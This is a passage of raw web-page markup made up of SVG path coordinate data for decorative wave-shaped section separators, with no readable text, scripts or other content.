d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59